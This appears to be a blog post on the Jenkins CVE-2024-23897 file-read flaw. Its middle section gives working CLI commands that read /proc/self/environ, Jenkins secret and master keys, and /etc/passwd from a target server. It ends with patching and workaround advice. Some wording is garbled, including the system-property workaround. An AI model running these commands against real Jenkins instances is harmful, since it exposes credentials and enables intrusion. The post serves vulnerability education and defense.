Vulnerability CVE-2024-23897 in Jenkins: All You Need to Know
Analyzing Vulnerability CVE-2024-23897.
Introduction
Security in software development is crucial to maintain the integrity and confidentiality of projects. In this blog, we will explore in detail the CVE-2024-23897 vulnerability affecting Jenkins, a popular continuous integration system. We will cover what this vulnerability is, how it can be exploited and what measures can be taken to mitigate its effects.
What is CVE-2024-23897?
The vulnerability originates in the args4j library used by Jenkins to parse command arguments and options. The library’s expandAtFiles function, enabled by default, became the root cause. Attackers with “Overall/Read” permissions could exploit this to read entire files, while those without could still glimpse the first three lines, depending on the CLI commands issued. In addition, this flaw extended its reach to binary files, potentially exposing cryptographic keys and sensitive information.
Security researcher Yaniv Nizry of Sonar discovered this flaw, demonstrating how an attacker could use this vulnerability to expand arguments to an arbitrary number of an arbitrary file in the Jenkins instance.
Technical Details
- Identifier: CVE-2024-23897
- Vulnerability Type: Arbitrary File Read
- Severity: 7.5 to 9.8
How Vulnerability Works?
Identify Vulnerable Feature:
- Jenkins employs a feature in its CLI command parser that allows replacing an ‘@’ character followed by a file path with the contents of the file. It is this feature that exploits the vulnerability.
Prepare the Environment:
- Set up your test environment with a Jenkins instance that complies with the above vulnerable versions.
- Make sure you have access to the Jenkins CLI. This can be done through the Jenkins CLI client installation or by using the web client.
Run the Vulnerable Command:
- First of all, you must download the command line client via jenkins-cli.jar http://localhost:8080/jnlpJars/jenkins-cli.jar.
- Read the file to get the Jenkins base directory, :/proc/self/environJENKINS_HOME=/var/jenkins_home
java -jar jenkins-cli.jar -s http://<IP>:8080/ -http connect-node "@/proc/self/environ"
- You can then use it to retrieve confidential files such as or (anonymously, only the first line of the file can be read via a command line error):secrets.key and master.key
java -jar jenkins-cli.jar -s http://<IP>:8080/ -http help 1 "@/var/jenkins_home/secret.key"
java -jar jenkins-cli.jar -s http://<IP>:8080/ -http help 1 "@/var/jenkins_home/secrets/master.key"
- Because the “Allow anonymous read access” option is enabled, you can also read the entire contents of a file:
java -jar jenkins-cli.jar -s http://<IP>:8080/ -http help 1 "@/etc/passwd"
Potential Impact
The impact of CVE-2024-23897 can be devastating, including:
- System Compromise: Unauthorized access to sensitive data and server configurations.
- Service Disruption: Possibility of disrupting CI/CD processes.
- Privilege Escalation: Use of Jenkins as an entry point to compromise other connected systems.
Mitigation Measures
To protect your Jenkins installation against CVE-2024-23897, consider the following measures:
Software Update
The most effective way to mitigate this vulnerability is to upgrade Jenkins to the latest version where this issue has been fixed. See the release notes for details.
Secure Configuration
- Input Validation: Implement mechanisms to validate and sanitize all inputs to the system.
- Access Control: Restrict permissions and ensure that only authorized users can access Jenkins.
Administrators seeking immediate relief, but unable to upgrade, can migrate this flaw by disabling CLI access altogether, a recommended stopgap measure that does not require a Jenkins restart.
disable this change by setting the Java system property hudson.cli.CLICommand.allowAtSyntax to true.
From theory to practice
Attached is Docker labs, to practice putting into practice a machine called SecretsJenkins.